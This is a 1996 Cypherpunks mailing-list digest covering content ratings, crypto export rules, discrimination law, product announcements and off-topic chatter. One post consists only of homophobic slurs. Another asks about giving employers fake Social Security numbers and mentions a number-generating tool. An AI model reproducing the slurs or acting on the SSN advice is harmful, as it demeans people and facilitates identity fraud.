> >and listen to it carefully about 20 times.  There are layers and

I have a very intelligent friend who loves jazz and has several thousand
LP's; he says Coltrane did some really good stuff early on, then went
kinda crazy...  I bought some 'trane albums in the 1960's.  My impression
was that they were very intellectual, or very technical, but not highly
musical (my opinion, and I love music).

[snip]

BTW, the person who claimed that Jazz was the more significant contribution
of African-Americans in America is very short-sighted.

Jazz is just one expression of a highly intelligent and complex group
of people.  You should hear some of the gorgeous songs of South Africa
as sung by Miriam Makeba, for instance.  Also, rock-n-roll emerged from
blues, R&B, etc., and is profoundly dominant in Western culture over all
other types of music, regardless of what you think of its quality.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 12 Dec 1996 11:59:30 -0800 (PST)
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Why PICS is the wrong approach
In-Reply-To: <199612120714.XAA04720@netcom14.netcom.com>
Message-ID: <32B043D8.4AC6@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Vladimir Z. Nuri wrote:
> Why TCM is wrong about PICS being wrong:
> >PICS is the wrong approach becuase it oversimplifies the ratings of
> >content, because it places the ratings made by the author in the payload
> >itself, and because third-party ratings systems are cut out of the loop
> >(effectively).

> bzzzzzzt. please read about it. there are multiple protocols. some
> of them allow third-party rating services. some of them support
> ratings within pages. the standard is neutral.

> also consider the new Firefly system that doesn't
> actually have fixed ratings on objects, but in which ratings are
> determined dynamically based on your own personal ratings of pages.

If Firefly is an example of what PICS is or could become, the hell with
PICS.  Firefly encourages and rewards group behavior and suppresses
individuality.  Firefly would reward the discussion of the latest album
by a Columbia or Capitol artist, and discourage discussion of material
from independent (real independent) labels.  I know because I've been
there and spent quite a bit of time trying to get a rating.

[remainder snipped]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Thu, 12 Dec 1996 10:13:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Redlining
Message-ID: <199612121813.KAA02708@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain



At 10:20 PM 12/11/1996, Matthew J. Miszewski wrote:
>>(Let me add that remailers are great.  I would be reluctant to express
>>these ideas in any other way for professional reasons.)
>
>hehehe.

Actually, there's nothing funny about the suppression of free speech.
What I fear is being dragged into a baseless "discrimination" lawsuit
if I should ever hire somebody from a "protected class" and find that
their employment needs to be terminated.  Note that the "protected
classes" constitute the overwhelming majority of the US population.

>>(Those who don't believe me should get "Love Supreme" by John
>>Coltrane and listen to it carefully about 20 times.  There are
>>layers and
>
>And what was it that Bird's contemporary society called him?  Was it
>crazy?  This is one of the social ills potentially caused by
>discrimination.  Far more important to me than the politics of any
>time is the music that a time period presents.  But this visionary
>jazz musician was all but discredited by the musical environment of
>the times.  Thankfully, it survived on its merits.  But imagine if
>the campaign to discredit Coltrane had been successful and my young
>ears never experienced that beauty.  That is part of the potential
>harm I am talking about.

Is this a joke?  How can we pass a law telling people to like
somebody's music?  Respect cannot be legislated.  It must be earned.

Red Rackham






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Admin@bexcol.demon.co.uk
Date: Thu, 12 Dec 1996 08:45:08 -0800 (PST)
To: sci.math@mail2news.demon.co.uk
Subject: Elliptic curves
Message-ID: <850408570.510393.0@bexcol.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



You are all a bunch of faggots. Faggot cannot be allowed on usenet as 
dictated by the great dr. Grubor.

Fuck you all.

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 12 Dec 1996 07:38:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Alegedly "Breaking News."
Message-ID: <v03007801aed5d755d5df@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


X-Sender: simsong@vineyard.net
Date: Thu, 12 Dec 1996 07:18:34 -0600
To: rah@shipwright.com
From: "Simson L. Garfinkel" <simsong@vineyard.net>
Subject: Alegedly "Breaking News."
Mime-Version: 1.0

Just for the record, my article doesn't say anything about this being a new
kind of attack. I wasn't pleased at all with Steve O'Keefe's press release
and I would really appreciate it if you published a correction or something
to cypherpunks...

-Simson

				* * *
LAST KNOWN LOCATION: ST. LOUIS, MO
				* * *
Follow Simson's trip at http://simson.net/trip96
Follow Simson's ramblings at http://www.packet.com/garfinkel

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Tunnicliffe" <Tunny@inference.com>
Date: Thu, 12 Dec 1996 10:59:09 -0800 (PST)
To: "'pjb@ny.ubs.com>
Subject: [OFF-TOPIC] RE: (Fwd) Books for Children's Hospitals
Message-ID: <c=US%a=_%p=Inference%l=LANDRU-961212185649Z-4122@landru.novato.inference2.com>
MIME-Version: 1.0
Content-Type: text/plain


>Paul writes:
>i know that this is WAY off topic, and that we never post off-topic mail
>here,
>but, this seems worthwhile, so please excuse, (maybe flames for off-topic
>posts
>will count )
>
>cheers,
>	-paul
>>"The Houghton-Mifflin publishing co. is giving books to children's
>>hospitals; how many books they give depends on how many emails they
>>receive from people around the world.  for every 25 emails they receive,
>>they give one book--it seems like a great way to help a good cause.
>>
>>All that you have to do is email share@hmco.com.
>>
>>I hope that you can spare the seconds...and let your friends know.  So far
>>they only have 3,401 messages...last year they reached 23,000.
>>
>>This seems like an easy and simple thing to do -- please take the time!"

My "urban legend detector" pegged when I saw this, but it turns out
to be on the level.  See http://www.hmco.com/hmco/trade/hmi/polar/
for more info.

Tunny
======================================================================
 James A. Tunnicliffe   | WWWeb: http://www.inference.com/~tunny
 Inference Corporation  | PGP Fingerprint:   CA 23 E2 F3 AC 2D 0C 77
 tunny@Inference.com    |                    36 07 D9 33 3D 32 53 9C
======================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 12 Dec 1996 08:04:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: New E-commerce Paper:
Message-ID: <1.5.4.32.19961212160119.006718c4@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


A new electronic commerce paper:

  "Internet Markets: Emerging Business Models"

  By Dan Yurman

  December 11, 1996

  Abstract

  What are business models for profiting on the net?

  Perhaps the best metaphor to describe Internet business 
  is that it is like the California gold rush of 1849. A 
  wave of entrepreneurial start-ups have entered the field, 
  but all are struggling to find the gold. The miners are 
  going broke while the saloon and general store owners, 
  and the brothels, are prospering. Anyone who wants to 
  make real money in mass markets is going to have to 
  break the mold of "business as usual" and offer real 
  value which is not available offline. Meanwhile, 
  business-to-business commerce is growing using the 
  time-based value of data exchange as a pricing mechanism.

  This brief paper considers the business models and 
  related success factors which favor profitability for 
  doing business on the Internet. It addresses four areas:

  + Mass Markets
  + Business-to-Business Markets
  + Online Banking
  + Advertising

-----

  http://jya.com/emarkets.htm  (44 kb)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Thu, 12 Dec 1996 11:21:49 -0800 (PST)
To: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Subject: Re: Silly me ...
In-Reply-To: <Pine.SUN.3.95.961211233439.632G-100000@viper.law.miami.edu>
Message-ID: <199612121921.LAA21166@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



I'm not sure which part of my message you feel is unfair.

The quotes come from:

    http://cyberwerks.com:70/0h/cyberwire/cwd/cwd.94.01.30.html

Incidentally, when I said "VP", I was exaggerating.  I think he became
a director at Air Touch.

Ern

> I have no idea if this is in reference to some thread I missed, but I
> think it's unfair.
>
> The evidence of this will be this year's CFP, chaired by the same Kent
> Walker.
>
> > Little did I know at that time that this is the same Walker that was
> > quoted by Meeks as saying cute lil' gems like ...
> >
> >     "If you ask the public, 'Is privacy more important than catching
> >      criminals?' They'll tell you, 'No.'"
> >
> > ... and ...
> >
> >     "It's easy to get caught up in the rhetoric that privacy is the
> >      end all be all."
> >
> > After a little bit of frustration, I wrote him off as someone cashing
> > in on his Justice days to be some VP of government relations (a.k.a.
> > lobbyist) with Air Touch.
> >
> > Perhaps there is something slightly more spooky with this character
> > than I originally thought.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Travis Ogden <traviso@spiritone.com>
Date: Thu, 12 Dec 1996 11:30:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: Windows 95 Easter Egg
Message-ID: <Pine.OSF.3.91.961212112443.25864i-100000@ridge.spiritone.com>
MIME-Version: 1.0
Content-Type: text/plain



	Thought you all may find this entertaining...

Regards,
Travis

 ---
  ~Webmaster~
~Tejedormaestro~

 Travis Ogden             SpiritOne, Inc.             traviso@SpiritOne.com
                         7302 N Richmond Ave
 Phone: 503.240.8200     Portland OR  97203          Portland's Quality
 Fax:   503.240.8205                                 Public-Access Provider
 
 Web:       http://www.SpiritOne.com
 Personal:  http://www.SpiritOne.com/~traviso

       ~All opinions expressed herein are mine and not my employers~
--- 

==============================================================================

1.Point the mouse at the desktop and click the right mouse button. 
Choose "New" from the resulting pop-up menu, and then choose 
"Folder." 

2.A new folder will appear on the desktop, with the temporary name 
"New Folder." Change the folder's name by typing "and now, the 
moment you've all been waiting for" (do not type the quotation marks), 
and pressing the Enter key. 

3.Point at the folder and click the right mouse button to display its 
pop-up context menu. Choose the Rename command, and type "we 
proudly present for your viewing pleasure" (again, without the 
quotation marks). Press the Enter key. 

4.Once again, right-click the folder and choose the Rename command. 
This time, type "The Microsoft Windows 95 Product Team!" (again, 
without the quotation marks). Press the Enter key. 

5.Double-click on the folder to open it. 

==============================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Walt Armour <walt@blarg.net>
Date: Thu, 12 Dec 1996 11:38:08 -0800 (PST)
To: "'Gabe Kostolny'" <gabe@ixlabs.com>
Subject: RE: !! Point 'n Crypt -- Win95 Privacy for Everyone !!
Message-ID: <01BBE820.DA06D920@dialup36.blarg.net>
MIME-Version: 1.0
Content-Type: text/plain


The focus for the current PnC offering is more privacy than security.  To 
avoid any issues of ITAR and export we chose to make the first version 
weak.  There will be future offerings that use stronger, non-exportable 
crypto.

As for the posting, I have seen the occasional commercial post float 
through.  This will be the only time that the post will show up on 
Cypherpunks.

Now if we can keep any long threads from getting kicked off (an all too 
common occurrence).  Perhaps replies could be taken to e-mail...

walt

----------
From: 	Gabe Kostolny[SMTP:gabe@ixlabs.com]
Sent: 	Thursday, December 12, 1996 2:45 AM
To: 	Walt Armour
Cc: 	coderpunks@toad.com
Subject: 	Re: !! Point 'n Crypt -- Win95 Privacy for Everyone !!

>
> Point 'n Crypt uses 40-bit DES-CBC (exportable), salted SHA passphrases,
> and conforms to PKCS #5 and PKCS #7.
>
It seems to me that anything that's exportable is pretty damn useless, if
you really want to keep something secret.  Also... I kinda got the
impression that this list wasn't for silly commercial traffic?

-gabe








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Thu, 12 Dec 1996 11:42:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Social Security Fraud
Message-ID: <199612121942.LAA22670@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain



Red Rackham wrote:
>>>As for the social security number, it has been claimed many times on
>>>this list that nobody checks them anyway.  There are programs which
>>>generate real-appearing numbers.  (I think one was called
>>>"ssn.exe".)
>
>>While I understand the greater social good, I, personally, am not
>>interested in violating applicable fraud statutes.  This is a
>>borderline case in which consideration to the idea, of course, should
>>be given.  I would hesitate to expose these people to that risk.
>
>I would not propose committing fraud.  I do not understand who would
>be defrauded by giving an employer an incorrect social security
>number.  The company pays the salary either way.

To which Matthew J. Miszewski replied:
>>I would not propose committing fraud.  I do not understand who would
>
>You already have.

As Mr. Miszewski is clearly too busy to answer my question, perhaps
some of the lawyers on the list will be kind enough to help me out.

Under what conditions is it fraudulent to give the wrong social
security number?

It seems to me that in the case of an employee giving the wrong number
to his employer, the only person that suffers is the employee through
loss of future payments from the Social Security Administration.  The
employer certainly doesn't suffer.  Assume that the income tax is
paid.

What laws would an employee violate?  What are the chances of
conviction?  What are the likely penalties if convicted?

Red Rackham






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alexander Chislenko <alexc@firefly.net>
Date: Thu, 12 Dec 1996 08:49:52 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: WEB: Yahoo/Firefly Website recommendation service
Message-ID: <3.0.32.19961212115032.00cf51b0@pop.firefly.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:52 PM 12/11/96 -0800, Dale Thorn wrote:
>Alexander Chislenko wrote:
>>   Firefly Network Inc. has just launched a public beta of our website
>> recommendation service on My Yahoo!  This service is the result of a
>> partnership between Yahoo! Inc. and Firefly Network, Inc. in application
>> of Automated Collaborative Filtering (ACF) technology to the Web.
>>   It allows users to find interesting websites interest and like-minded
>> people, and otherwise help the user navigate the vast domain of sites
>> and people in an intelligent and personalized way.
>
>I tried Firefly.  What a waste.  Unless your tastes in most things
>entertainment-wise are pretty mundane (music=Pearl Jam, Prince,
>other mainstream drek), they won't be able to find a match at all,
>no matter how much information you give them!
>

  You are talking about our first site, with music and movie recommendations.
I personally rated not-at-all-mainstream movies by Kurosawa and Tarkovsky and
got a similar advice.  Though, I agree, the recommendations are not perfect.
Partly, because the most of the audience are mainstream.  Partly, because
the site <www.ffly.com> runs the first version of our ACF software server.
The website recommendation uses the feature-guided ACF server that I hoped
would solve most of the algorithmic problems we encountered in the music
and movie domains.  I'd be interested to know what you think of it.

 Also: I created a group profile, name: cypherpunk, password: group
that people on this list might use together as a common interest view,
or a joint bookmark list. 


---------------------------------------------------------------------------
Alexander Chislenko <sasha1@netcom.com>     www.lucifer.com/~sasha/home.html
Firefly Network, Inc.: <alexc@firefly.net>  www.ffly.com  617-234-5452
---------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 12 Dec 1996 10:31:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Cypherpunks Dec Mtg / upDate + TEXT-only version
In-Reply-To: <Pine.LNX.3.91.961212153748.7328N-100000@freenet.bishkek.su>
Message-ID: <LF3TyD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Fyodor Yarochkin <fygrave@freenet.bishkek.su> writes:

> Hey.. is there any CoderPunks Meetings somewhere in russia?
> 
I think it would be interesting to organize one.
Every wannabe asshole will show up.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: camcc@abraxis.com (Alec)
Date: Thu, 12 Dec 1996 09:11:59 -0800 (PST)
To: pjb@ny.ubs.com
Subject: Re: (Fwd) Books for Children's Hospitals
Message-ID: <3.0.32.19961212121231.0068ba60@smtp1.abraxis.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:45 AM 12/12/96 -0500, you wrote:
:i know that this is WAY off topic, and that we never post off-topic mail
here,
:but, this seems worthwhile, so please excuse, (maybe flames for off-topic
posts
:>
[snip]
:>All that you have to do is email share@hmco.com.
:>
:>I hope that you can spare the seconds...and let your friends know.  So far
:>they only have 3,401 messages...last year they reached 23,000.
:>[snip]
Sounds like a great way to mailbomb someone. Discretion invited.




Cordially,

Alec                   

PGP Fingerprint:
Type bits/keyID    Date       User ID
pub  1024/41207EE5 1996/04/08 Alec McCrackin <camcc@abraxis.com>
          Key fingerprint =  09 13 E1 CB B3 0C 88 D9  D7 D4 10 F0 06 7D DF 31 
                             





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 12 Dec 1996 21:55:07 -0800 (PST)
To: John Young <jya@pipeline.com>
Subject: Re: New E-commerce Paper:
In-Reply-To: <1.5.4.32.19961212160119.006718c4@pop.pipeline.com>
Message-ID: <32B06DAA.3DFC@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


John Young wrote:
> A new electronic commerce paper:
>   "Internet Markets: Emerging Business Models"
>   By Dan Yurman
>   December 11, 1996
>   What are business models for profiting on the net?
>   Perhaps the best metaphor to describe Internet business
>   is that it is like the California gold rush of 1849. A
>   wave of entrepreneurial start-ups have entered the field,
>   but all are struggling to find the gold. The miners are
>   going broke while the saloon and general store owners,
>   and the brothels, are prospering. Anyone who wants to
>   make real money in mass markets is going to have to
>   break the mold of "business as usual" and offer real
>   value which is not available offline.

Offer "real value", huh?

The one guy who produces something does OK,
The leeches do OK,
But the vast majority who aren't so *lucky* don't do OK.

So the general public is encouraged to follow this example of
economic opportunity?  More decadence and ruin, if you ask me.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 12 Dec 1996 21:55:56 -0800 (PST)
To: Alexander Chislenko <alexc@firefly.net>
Subject: Re: WEB: Yahoo/Firefly Website recommendation service
In-Reply-To: <3.0.32.19961212115032.00cf51b0@pop.firefly.net>
Message-ID: <32B06FFA.D7B@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Alexander Chislenko wrote:
> At 06:52 PM 12/11/96 -0800, Dale Thorn wrote:
> >Alexander Chislenko wrote:
> >>   Firefly Network Inc. has just launched a public beta of our website
> >> recommendation service on My Yahoo!  This service is the result of a
> >> partnership between Yahoo! Inc. and Firefly Network, Inc. in application
> >> of Automated Collaborative Filtering (ACF) technology to the Web.[snip]
> The website recommendation uses the feature-guided ACF server that I hoped
> would solve most of the algorithmic problems we encountered in the music
> and movie domains.  I'd be interested to know what you think of it.

Thanks for the reply.  My experience with Firefly #1 has shown that the
people who would most need the service (or need it at all) are the least
likely to benefit from it, which is why I think it's a bad thing, wasting
a lot of valuable time hand-entering data, only to find it doesn't
correlate the more interesting (non-mainstream) data.

I'll try the website service, but my up-front instinct is that it won't
be much better unless the software is a *whole lot* better.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ca3sal@isis.sunderland.ac.uk (Stephen.George.Allport)
Date: Thu, 12 Dec 1996 05:01:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: Neural Nets
Message-ID: <199612121300.NAA04640@cisc07.cis.sund.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


Hi Folkd

Just sat through a lecture on an itroduction to  Neural Nets. 

Thought. Does anybody know of any tools that use Neural Nets to break
ciphers?

Cheers

Ste




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Thu, 12 Dec 1996 10:25:00 -0800 (PST)
To: Law &amp; Policy of Computer Communications <CYBERIA-L@LISTSERV.AOL.COM>
Subject: Re: Draft of Commerce Department Crypto Regs
In-Reply-To: <199612111958.LAA06592@gw.quake.net>
Message-ID: <199612121822.NAA11823@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Cindy Cohn writes:

: Steptoe and Johnson have kindly posted the draft Commerce Department
: regulations on encryption exports at http://www.steptoe.com/commerce.htm.

Thanks.  Since it took a long time to download them from Steptoe and 
Johnson's web site, I have taken the liberty of mirroring them at 

   http://samsara.law.cwru.edu/comp_law/commerce.proposed.regs.html 

on my web server.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu
                     URL:  http://samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Thu, 12 Dec 1996 14:12:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: In Defense of Anecdotal Evidence
Message-ID: <199612122212.OAA27964@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain



At 12:09 AM 12/12/1996, E. Allen Smith wrote:
>From:   IN%"mjmiski@execpc.com"  "Matthew J. Miszewski" 11-DEC-1996 19:43:51.88
>>If I wanted to I could repeatedly issue heart-wrenching stories of
>>poverty in America (similar, of course, to politicians using "real
>>world examples" in speeches).  You seem to assume that this would be
>>"wrong".
>
>        As did Ronald Reagan in talking about "welfare queens"... as
>could I in discussing how my grandparents got out of poverty and have
>two children with MDs and one with a PhD. Statistics are preferable
>to anecdotal evidence for just this reason; I've seen that over and
>over again in science. Anecdotes are for lawyers talking to juries
>and demagogic politicians talking to the masses.

Statistics are a useful tool, but they have their problems.  Their
accuracy is often in doubt.  Most scientific data comes with an error
analysis so you can tell what the figure means.  For some reason
statisticians never do this so we cannot tell whether their numbers
are accurate to within 0.1%, 1.0%, 10%, or even worse.

There are many other problems.  For instance, users of statistics
assume they have a random sample, even in cases where that is far from
clear.

Social statistics are a black art.  There was a study awhile back
which claimed gun ownership reduced violent crime.  That is a
surprising result.  It was apparently obtained by subtracting out all
the other factors that could explain the differences in the areas
studied.  This process must involve some real stretches statistically.
I can't imagine how cultural differences are determined and
subtracted - I assume it is a subjective process.

Another problem with statistics is that they are difficult to verify.
We may wish to verify the information in cases of deception -
sometimes well meaning - but also for cases of statistical
incompetence.  It is also hard to explore the details of the study if
the authors are unavailable.

The advantage of first hand experience is that it is primary evidence.
You know it's true because you were there and saw it.

The advantage of anecdotal evidence (in the sense we have been using
it) is that the person who is telling you the anecdote was there and
saw it.  You can cross-examine them and get a full understanding of
the evidence provided.

Specific examples, that is anecdotal evidence, also provide a nice
framework for discussing our abstract beliefs about what is morally
right or wrong, or what various parties should be expected to do or
say in particular situations.  Specific examples also make it possible
for the participants in the conversation to deepen their own
understanding of their experiences.  You might have seen something and
interpreted it in a particular way.  Somebody else might be able to
show you how you misinterpreted what you saw.

Red Rackham






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 12 Dec 1996 11:30:27 -0800 (PST)
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: R3 ANNOUNCES SSL HTTP SOLUTION PROVIDING (fwd)
Message-ID: <199612121927.OAA22464@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



----- Forwarded message from Strate Andreas E. -----

>From list@glacier.mcom.com  Thu Dec 12 11:42:56 1996
Resent-Date: Thu, 12 Dec 1996 08:33:29 -0800 (PST)
From: "Strate Andreas E." <strate@r3.ch>
To: "'ssl-talk'" <ssl-talk@netscape.com>
Subject: R3 ANNOUNCES SSL HTTP SOLUTION PROVIDING
Date: Thu, 12 Dec 1996 17:32:00 +0100
Message-Id: <96Dec12.173217gmt+0100.41475@gateway.r3.ch>
Encoding: 56 TEXT
X-Mailer: Microsoft Mail V3.0
Resent-Message-ID: <"IBQbP2.0.UY.MF3io"@glacier>
Resent-From: ssl-talk@netscape.com
X-Mailing-List: <ssl-talk@netscape.com> archive/latest/3087
X-Loop: ssl-talk@netscape.com
Precedence: list
Resent-Sender: ssl-talk-request@netscape.com

[Charset ISO-8859-1 unsupported, filtering to ASCII...]


R3 ANNOUNCES SSL HTTP SOLUTION PROVIDING STRONG CRYPTOGRAPHY

Aathal, Switzerland, December 12, 1996 - r3 security engineering ag
announces
"r3 SSL HTTP Client"  which provides strong cryptography to any browser
which supports HTTP proxies. The product available on Win95/NT and
Win3.1 is in final Beta state and will be available on these
platforms by the end of this year. A beta version of "r3 SSL HTTP Client"

can be downloaded from  http://www.r3.ch/products/ssl/


The "r3 SSL HTTP Client" has been selected by the major Swiss Banks to
enable their homebanking applications with their customers. The solution
provides strong cryptography based on the 128 bit IDEA algorithm. Export
security and smaller key lengths were ruled out as inacceptable for
sensitive Internet homebanking services.

Strong cryptography with 128 bit IDEA algorithm is a
must for their homebanking Internet services.


The "r3 SSL HTTP Client" is part of a suite of SSL products
developed by r3 security engineering which consists of

_ r3 SSL HTTP Server
_ r3 SSL HTTP Proxy Server
_ r3 SSL HTTP Gateway
_ r3 SSL FTP Server
_ r3 SSL FTP Gateway

The r3 SSL server products will be available during the first quarter 97.

r3 security engineering ag - located in Aathal/Zurich, Switzerland -
is one of the major providers for security solutions in the area of
EDIFACT and Internet applications. r3's activities in international
standardization committees and in research projects guarantee state
of the art products and solutions.

"r3 SSL HTTP Server" and "r3 SSL HTTP Client" are trademarks of r3.

r3 SSL products use software modules developed by Eric Young
(eay@mincom.oz.au). Eric Young's SSLeay is used but the SSL layer
has been completely reengineered to provide full control over the SSL
handshake.

For further information please contact :
 ----------------------------------------------------
Andreas E. Strate         r3 security engineering ag
Internet: strate@r3.ch    Hofstrasse 98
Phone:  +41 1 934 56 56   CH-8620 Wetzikon
Direct: +41 1 934 56 72   Switzerland
Fax:    +41 1 934 56 79   http://www.r3.ch/
 ----------------------------------------------------

----- End of forwarded message from Strate Andreas E. -----

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Abelson <hal@martigny.ai.mit.edu>
Date: Thu, 12 Dec 1996 12:29:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: Whom can you trust with your keys -- government version
Message-ID: <199612122029.AA144522566@martigny.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


The Commerce Department draft crypto export regulations (see
http://www.steptoe.com/commerce.htm) include the following stipulation
on Key Recovery Agents:


    Evidence of an individual's suitability and trustworthiness [to
    act as a key recovery agent] shall include:

	(i) Information indicating that the individual(s):

	     (A) Has no criminal convictions of any kind or
	     pending criminal charges of any kind;

	     (B) Has not breached fiduciary
	     responsibilities (e.g., has not violated any
	     surety or performance bonds); and

	     (C) Has favorable results of a credit check;
	     or,

       (ii) Information that the individual(s) has an active
       U.S. government security clearance of Secret or higher
       issued or updated within the last five years.

It's nice to know that we can trust ex-cons, frauds, and deadbeats to
hold our keys, provided that they have obtained a Secret clearance.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAwUBMrBrBfiGKLV9Y6XFAQH53AP5AXAG5ys1ju6R1imLJYTKQcgDtNec9YBw
kSimzx/GIOAf0eWJFTU+fMTsJp9g7K1LasNYRYfXM2aqPuwB6UJ2PU1JKhi2u8ew
Qk06TllDvhzGwWTCAd53J616181srw3Gb+lARvBQT4m/1trRNDR24d0rdxS7jxPk
ytwNprO06zQ=
=CXXb
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fyodor Yarochkin <fygrave@freenet.bishkek.su>
Date: Thu, 12 Dec 1996 02:42:56 -0800 (PST)
To: Dave Del Torto <ddt@pgp.com>
Subject: Re: Cypherpunks Dec Mtg / upDate + TEXT-only version
In-Reply-To: <v03100b00aed4e4e25a04@[204.179.136.87]>
Message-ID: <Pine.LNX.3.91.961212153748.7328N-100000@freenet.bishkek.su>
MIME-Version: 1.0
Content-Type: text/plain


Hey.. is there any CoderPunks Meetings somewhere in russia?

-X----- Fyodor --- fygrave@freenet.bishkek.su --------------------------X--
  "With heart and hand I pledge you while I load my gun again, you will
   never be fogotten or the enemy forgiven, my good comrade..."
                                               - Anton Szandor LaVay
-X--http://www.freenet.bishkek.su/fygrave.html---tel:(3312)474465-------X--
-X--http://www.geocities.com/SunsetStrip/Alley/8302-mirror-at-geocities-X--
             pgp is awaliable from pgp-key-servers :
pub  2048/3D22AF59 1980/03/24 Fyodor Yarochkin <fygrave@freeenet.bishkek.su>
   Key fingerprint = 1F 38 55 07 98 F9 42 7D  57 73 74 FA 9C 5B 29 FB

"As Above, So Below.
The Macrocosm, the Microcosm.
The Entire Universe is Contained
In The Human Creature"
        To The Fallen Angels





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Thu, 12 Dec 1996 14:04:16 -0800 (PST)
To: EALLENSMITH@ocelot.Rutgers.EDU (E. Allen Smith)
Subject: Re: Redlining
In-Reply-To: <01ICXGBPMPJ4AEL7YC@mbcl.rutgers.edu>
Message-ID: <199612122159.PAA11494@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


E. Allen Smith wrote:
> 
> From:	IN%"ichudov@algebra.com" 11-DEC-1996 19:45:12.83
> 
> >A good question. It is based on the theory that every person has a
> >"utility" function in their mind. This function determines the "worth"
> >of money and worthiness of risk. 
> 
> >If that function as a function of income is strictly concave
> 
> 	Except in the case of a consumer for whom the lower end is essentially
> no different than 0 - e.g., a minimum amount for survival - having a concave
> utility function for money (as opposed to less-convertible goods/services)
> is irrational. While I am in favor of allowing people to be irrational if they
> so desire, I am not in favor of governmental rules (e.g., coercive rules) being
> determined by irrationality. See my comments on emotion to Matt M.

Utility functions, are never irrational. I like tangerines and hate
apples, some other are the other way around, but it is not irrational.

Concavity of utility function of money (equivalence of risk-aversion)
for most consumers is an empirical fact.

I agree that rationality per se should not be mandated by the government 
rules  though.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 12 Dec 1996 13:08:37 -0800 (PST)
To: dthorn@gte.net
Subject: Re: Redlining
Message-ID: <01ICXFPL6XZOAEL7YC@mbcl.rutgers.edu>
